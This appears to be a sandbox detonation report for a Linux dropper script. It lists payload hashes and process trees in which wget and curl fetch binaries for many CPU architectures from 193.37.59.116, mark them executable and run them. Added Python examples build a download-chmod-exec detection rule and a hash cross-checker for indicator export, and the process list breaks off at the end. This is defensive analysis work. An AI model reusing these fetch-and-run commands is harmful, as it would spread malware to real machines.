| SHA512 | 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76 |
/tmp/arm7
| MD5 | d0084c21e35f40b71450406d0298e622 |
| SHA1 | f2ce386f6ba9afdb7f95272ab867c913b0802cd9 |
| SHA256 | 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f |
| SHA512 | 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727 |
/tmp/ppc
| MD5 | 9b27ba0a33c0ecaf4c48bc1fdabf2538 |
| SHA1 | d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266 |
| SHA256 | 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618 |
| SHA512 | 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea |
/tmp/spc
| MD5 | 839129f80935155dff6a2db49753d6a9 |
| SHA1 | d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba |
| SHA256 | 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457 |
| SHA512 | ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3 |
/tmp/m68k
| MD5 | e6391e323b334b1257f36bb2fcb34e25 |
| SHA1 | 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41 |
| SHA256 | 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728 |
| SHA512 | b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958 |
/tmp/sh4
| MD5 | f26f51b05d46bea29bcab58abb1a9ec1 |
| SHA1 | 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf |
| SHA256 | ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466 |
| SHA512 | b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea |
Analysis: behavioral5
Detonation Overview
Submitted
2024-08-29 19:31
Reported
2024-08-29 19:36
Platform
debian9-mipsel-20240418-en
Max time kernel
31s
Max time network
34s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target | Count |
| N/A | /tmp/RUN | /tmp/RUN | N/A | 13 |
Reads runtime system information
| Description | Indicator | Process | Target | Count |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A | 13 |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/RUN | /tmp/jack5tr.sh | N/A |
| File opened for modification | /tmp/mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arc | /usr/bin/curl | N/A |
Processes
/tmp/jack5tr.sh
[/tmp/jack5tr.sh]
/usr/bin/wget
[wget http://193.37.59.116/x86]
/usr/bin/curl
[curl -O http://193.37.59.116/x86]
/bin/cat
[cat x86]
/bin/chmod
[chmod +x jack5tr.sh RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mips]
/usr/bin/curl
[curl -O http://193.37.59.116/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x jack5tr.sh mips RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arc]
/usr/bin/curl
[curl -O http://193.37.59.116/arc]
/bin/cat
[cat arc]
/bin/chmod
[chmod +x arc jack5tr.sh mips RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/x86_64]
/usr/bin/curl
[curl -O http://193.37.59.116/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x arc jack5tr.sh mips RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mpsl]
/usr/bin/curl
[curl -O http://193.37.59.116/mpsl]
/bin/cat
[cat mpsl]
/bin/chmod
[chmod +x arc jack5tr.sh mips mpsl RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm]
/usr/bin/curl
[curl -O http://193.37.59.116/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x arc arm jack5tr.sh mips mpsl RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm5]
/usr/bin/curl
[curl -O http://193.37.59.116/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x arc arm arm5 jack5tr.sh mips mpsl RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm6]
/usr/bin/curl
[curl -O http://193.37.59.116/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x arc arm arm5 arm6 jack5tr.sh mips mpsl RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm7]
/usr/bin/curl
[curl -O http://193.37.59.116/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/ppc]
/usr/bin/curl
[curl -O http://193.37.59.116/ppc]
/bin/cat
[cat ppc]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/spc]
/usr/bin/curl
[curl -O http://193.37.59.116/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN spc systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/m68k]
/usr/bin/curl
[curl -O http://193.37.59.116/m68k]
/bin/cat
[cat m68k]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN spc systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/sh4]
/usr/bin/curl
[curl -O http://193.37.59.116/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN sh4 spc x86 x86_64]
/tmp/RUN
[./RUN]
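The mipsel run reproduces the same tree as the armhf run: one parent shell (/tmp/jack5tr.sh) spawning wget, curl, cat, chmod and ./RUN per architecture. That shape is a detection on its own, independent of the host, URL or hashes: a process downloads into a world-writable directory, the same parent marks a file there executable, and then executes it. The correlation rule below is an added example, not part of the report; it models execve telemetry as dicts with the fields an auditd or EDR pipeline would carry (ts, pid, ppid, exe, argv, cwd; the field names, the pids and every sample event are constructed for the example, the malicious ones from the process list above, the benign ones invented), and raises one alert per completed chain.

```python
"""Turn the recorded process tree into a host-telemetry detection.

Added example, not from the report: the sandbox shows one shell (/tmp/jack5tr.sh)
spawning wget/curl, chmod +x and ./RUN in a loop. Modelled as execve events in
the shape an auditd or EDR pipeline would deliver, that is a three-step chain a
correlation rule can alert on without knowing the URL or the payload hashes.
Event field names and all sample events below are constructed for the example.
"""
from collections import defaultdict

DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def _in_scratch(path):
    return path.startswith(SCRATCH_DIRS)


def _chmod_targets(argv, cwd):
    """Absolute paths chmod was asked to change (mode flags such as +x skipped)."""
    names = [a for a in argv[1:] if not a.startswith(("+", "-"))]
    return {a if a.startswith("/") else cwd + a for a in names}


def correlate(events, window=120):
    """Alert when one parent does: download into a scratch dir, chmod +x there,
    then execute a file it just chmod'ed, all within `window` seconds."""
    by_parent = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_parent[ev["ppid"]].append(ev)

    alerts = []
    for ppid, evs in by_parent.items():
        fetched, chmodded = None, set()
        for ev in evs:
            tool = ev["exe"].rsplit("/", 1)[-1]
            cwd = ev["cwd"].rstrip("/") + "/"
            recent = fetched is not None and ev["ts"] - fetched["ts"] <= window
            if tool in DOWNLOADERS and _in_scratch(cwd):
                fetched, chmodded = ev, set()       # (re)start the chain
            elif tool == "chmod" and recent and "+x" in ev["argv"]:
                chmodded |= _chmod_targets(ev["argv"], cwd)
            elif recent and _in_scratch(ev["exe"]) and ev["exe"] in chmodded:
                alerts.append({
                    "ppid": ppid,
                    "download": " ".join(fetched["argv"]),
                    "executed": ev["exe"],
                    "chmod_targets": len(chmodded),
                })
                fetched, chmodded = None, set()     # one alert per completed chain
    return alerts


def _ev(ts, ppid, exe, argv, cwd):
    return {"ts": ts, "ppid": ppid, "exe": exe, "argv": argv, "cwd": cwd}


SANDBOX_TMPDIR = "systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF"
URL = "http://193.37.59.116"

SAMPLE_EVENTS = [
    # Constructed from the behavioral3 process list: parent pid 4242 stands for /tmp/jack5tr.sh.
    _ev(0, 4242, "/usr/bin/wget", ["wget", f"{URL}/x86"], "/tmp"),
    _ev(1, 4242, "/usr/bin/curl", ["curl", "-O", f"{URL}/x86"], "/tmp"),
    _ev(2, 4242, "/bin/cat", ["cat", "x86"], "/tmp"),
    _ev(3, 4242, "/bin/chmod", ["chmod", "+x", "jack5tr.sh", "RUN", SANDBOX_TMPDIR, "x86"], "/tmp"),
    _ev(4, 4242, "/tmp/RUN", ["./RUN"], "/tmp"),
    _ev(5, 4242, "/usr/bin/wget", ["wget", f"{URL}/mips"], "/tmp"),
    _ev(6, 4242, "/usr/bin/curl", ["curl", "-O", f"{URL}/mips"], "/tmp"),
    _ev(7, 4242, "/bin/cat", ["cat", "mips"], "/tmp"),
    _ev(8, 4242, "/bin/chmod", ["chmod", "+x", "jack5tr.sh", "mips", "RUN", SANDBOX_TMPDIR, "x86"], "/tmp"),
    _ev(9, 4242, "/tmp/RUN", ["./RUN"], "/tmp"),
    # Benign (constructed): an admin fetches a script into their home directory and runs it.
    _ev(20, 777, "/usr/bin/curl", ["curl", "-O", "https://example.invalid/tool.sh"], "/home/alice"),
    _ev(21, 777, "/bin/chmod", ["chmod", "+x", "tool.sh"], "/home/alice"),
    _ev(22, 777, "/home/alice/tool.sh", ["./tool.sh"], "/home/alice"),
    # Benign (constructed): a build helper executes from /tmp but nothing was downloaded first.
    _ev(30, 888, "/bin/chmod", ["chmod", "+x", "configure"], "/tmp/build"),
    _ev(31, 888, "/tmp/build/configure", ["./configure"], "/tmp/build"),
]

ALERTS = correlate(SAMPLE_EVENTS)

if __name__ == "__main__":
    for alert in ALERTS:
        print(alert)
```

The rule keys on the parent pid rather than on the file name, because RUN is overwritten and re-executed thirteen times by the same shell; keying on the file would collapse the loop into one hit and hide how many payloads were tried. The `window` guards against stale chains in long-lived shells: with a window too short to span fetch, chmod and exec, the sample produces no alert at all.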
Network
| Country | Destination | Domain | Proto | Count |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp | 26 |
Files
/tmp/x86
| MD5 | c4a3f27654d167d92ac6df60a02b40e2 |
| SHA1 | b1707a6ada4a6538e7595cbbdd2cd3b3d2294166 |
| SHA256 | 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100 |
| SHA512 | ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66 |
/tmp/mips
| MD5 | 038943a024bba0e623ee0fc71c0e9dc4 |
| SHA1 | daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b |
| SHA256 | 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb |
| SHA512 | 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07 |
/tmp/arc
| MD5 | 154506d20dcd8502b3820a2912b697e9 |
| SHA1 | 55c207a1c0aeabc6df6d0307f11a03137139d701 |
| SHA256 | 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c |
| SHA512 | aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112 |
/tmp/x86_64
| MD5 | 74eff98ceea934700653d0c0620419f8 |
| SHA1 | 037df252464667dbcdc6f4fde3ff9043a3b76909 |
| SHA256 | 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89 |
| SHA512 | 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c |
/tmp/mpsl
| MD5 | eba2a5a74d5beba7b9f903cfe07f9796 |
| SHA1 | 012af86b452d7e7f82bbd45b5bbef672d2b25c67 |
| SHA256 | 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea |
| SHA512 | a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be |
/tmp/arm
| MD5 | 6b1fc0e45d31470659fe0e295bc63d4e |
| SHA1 | ce54569f5eefe03f56d5df2df3fe4830b0c9f177 |
| SHA256 | 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22 |
| SHA512 | f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea |
/tmp/RUN
| MD5 | 9c1344aa17dc266ff8f8637b2becfc46 |
| SHA1 | 2dedb0abaf75446902f162dc8fc6e9b04fb9a8ee |
| SHA256 | 423e707b0c9e2d015f8f46df9053bbe469f240b7e1b5f9248f3172eecb36e4e4 |
| SHA512 | 382a31d139ee354d0078c06de83a3cce1cfe568c45b0b6b6586e954d0fc048ded37227797fe078ffcdd5539c2f70fd8338b5b6d72fb3a3e7f22230deacbb1da1 |
/tmp/arm5
| MD5 | fc7db008f770f37ccb16e8d23f9780ae |
| SHA1 | acd2865df9fec74fdafb227ce3136b715bb998b0 |
| SHA256 | 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db |
| SHA512 | c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c |
/tmp/arm6
| MD5 | d6227412be050807781b974181739db6 |
| SHA1 | 14d20849fc59a62ed7f713afda3d9dda4cc2c850 |
| SHA256 | e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09 |
| SHA512 | 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76 |
/tmp/arm7
| MD5 | d0084c21e35f40b71450406d0298e622 |
| SHA1 | f2ce386f6ba9afdb7f95272ab867c913b0802cd9 |
| SHA256 | 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f |
| SHA512 | 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727 |
/tmp/ppc
| MD5 | 9b27ba0a33c0ecaf4c48bc1fdabf2538 |
| SHA1 | d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266 |
| SHA256 | 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618 |
| SHA512 | 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea |
/tmp/spc
| MD5 | 839129f80935155dff6a2db49753d6a9 |
| SHA1 | d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba |
| SHA256 | 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457 |
| SHA512 | ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3 |
/tmp/m68k
| MD5 | e6391e323b334b1257f36bb2fcb34e25 |
| SHA1 | 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41 |
| SHA256 | 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728 |
| SHA512 | b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958 |
/tmp/sh4
| MD5 | f26f51b05d46bea29bcab58abb1a9ec1 |
| SHA1 | 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf |
| SHA256 | ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466 |
| SHA512 | b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea |
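Every digest in this Files section is identical to the one the behavioral3 (armhf) run reported, so the server at 193.37.59.116 handed the same thirteen payloads to a mipsel requester as to an armhf one; the payload set, not the requesting platform, is what the hashes identify. Note also that /tmp/RUN carries a SHA256 that matches none of the thirteen per-architecture files, so it must be recorded as its own indicator rather than treated as an alias for one of them. The script below is an added example, not part of the report: it parses the Files tables in the format used on this page, validates each digest length (a truncated hash is the usual copy-and-paste failure when moving indicators into a blocklist), confirms the two runs agree, and emits deduplicated rows. Only three of the fourteen entries from each run are embedded.

```python
"""Cross-check the dropped-file hashes two sandbox runs report for the same sample.

Added example, not part of the report: it parses the "Files" tables (a path
line followed by "| MD5 | ... |" rows), validates each digest's length, and
confirms that the behavioral3 and behavioral5 runs saw byte-identical payloads.
Only three of the fourteen entries per run are embedded here.
"""
import re

DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")

# Excerpts copied from the behavioral3 and behavioral5 Files sections.
FILES_B3 = """\
/tmp/x86
| MD5 | c4a3f27654d167d92ac6df60a02b40e2 |
| SHA1 | b1707a6ada4a6538e7595cbbdd2cd3b3d2294166 |
| SHA256 | 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100 |
/tmp/RUN
| MD5 | 9c1344aa17dc266ff8f8637b2becfc46 |
| SHA1 | 2dedb0abaf75446902f162dc8fc6e9b04fb9a8ee |
| SHA256 | 423e707b0c9e2d015f8f46df9053bbe469f240b7e1b5f9248f3172eecb36e4e4 |
/tmp/sh4
| MD5 | f26f51b05d46bea29bcab58abb1a9ec1 |
| SHA1 | 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf |
| SHA256 | ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466 |
"""

FILES_B5 = """\
/tmp/sh4
| MD5 | f26f51b05d46bea29bcab58abb1a9ec1 |
| SHA1 | 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf |
| SHA256 | ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466 |
/tmp/x86
| MD5 | c4a3f27654d167d92ac6df60a02b40e2 |
| SHA1 | b1707a6ada4a6538e7595cbbdd2cd3b3d2294166 |
| SHA256 | 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100 |
/tmp/RUN
| MD5 | 9c1344aa17dc266ff8f8637b2becfc46 |
| SHA1 | 2dedb0abaf75446902f162dc8fc6e9b04fb9a8ee |
| SHA256 | 423e707b0c9e2d015f8f46df9053bbe469f240b7e1b5f9248f3172eecb36e4e4 |
"""


def parse_files(text):
    """Map each reported path to its {algorithm: digest} dict, rejecting bad digests."""
    files, path = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ROW.match(line)
        if m is None:
            if not line.startswith("/"):
                raise ValueError(f"unexpected line: {line!r}")
            path = line
            files[path] = {}
            continue
        algo, digest = m.group(1), m.group(2).lower()
        if len(digest) != DIGEST_LEN[algo]:
            raise ValueError(f"{path}: {algo} digest has {len(digest)} hex chars")
        files[path][algo] = digest
    return files


def compare_runs(a, b):
    """Return (paths with identical digests, paths that differ, paths seen in only one run)."""
    same, diff = [], []
    for p in sorted(set(a) & set(b)):
        (same if a[p] == b[p] else diff).append(p)
    return same, diff, sorted(set(a) ^ set(b))


def run_matches_payload(files):
    """Path of the payload whose SHA256 equals /tmp/RUN's, or None if there is none."""
    run = files.get("/tmp/RUN", {}).get("SHA256")
    for path, digests in files.items():
        if path != "/tmp/RUN" and digests.get("SHA256") == run:
            return path
    return None


def ioc_rows(*runs):
    """Deduplicated, sorted (sha256, path) rows for a CSV or STIX export."""
    seen = {}
    for run in runs:
        for path, digests in run.items():
            seen.setdefault(digests["SHA256"], path)
    return sorted(seen.items())


B3, B5 = parse_files(FILES_B3), parse_files(FILES_B5)

if __name__ == "__main__":
    print(compare_runs(B3, B5))
    print("RUN matches:", run_matches_payload(B3))
    for sha256, path in ioc_rows(B3, B5):
        print(f"{sha256},{path}")
```

On the full tables the two runs agree on all fourteen paths, `ioc_rows` yields fourteen unique SHA256 values, and `run_matches_payload` stays None.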
Analysis: behavioral8
Detonation Overview
Submitted
2024-08-29 19:31
Reported
2024-08-29 19:36
Platform
ubuntu2204-amd64-20240522.1-en
Max time kernel
2s
Max time network
131s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target | Count |
| N/A | /tmp/RUN | /tmp/RUN | N/A | 13 |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RUN | /tmp/jack5tr.sh | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x86_64 | /usr/bin/curl | N/A |
Processes
/tmp/jack5tr.sh
[/tmp/jack5tr.sh]
/usr/bin/wget
[wget http://193.37.59.116/x86]
/usr/bin/curl
[curl -O http://193.37.59.116/x86]
/usr/bin/cat
[cat x86]
/usr/bin/chmod
[chmod +x RUN gdm3-config-err-gfb7nI jack5tr.sh snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mips]
/usr/bin/curl
[curl -O http://193.37.59.116/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x RUN gdm3-config-err-gfb7nI jack5tr.sh mips snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arc]
/usr/bin/curl
[curl -O http://193.37.59.116/arc]
/usr/bin/cat
[cat arc]
/usr/bin/chmod
[chmod +x RUN arc gdm3-config-err-gfb7nI jack5tr.sh mips snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/x86_64]
/usr/bin/curl
[curl -O http://193.37.59.116/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x RUN arc gdm3-config-err-gfb7nI jack5tr.sh mips snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mpsl]
/usr/bin/curl
[curl -O http://193.37.59.116/mpsl]
/usr/bin/cat
[cat mpsl]
/usr/bin/chmod
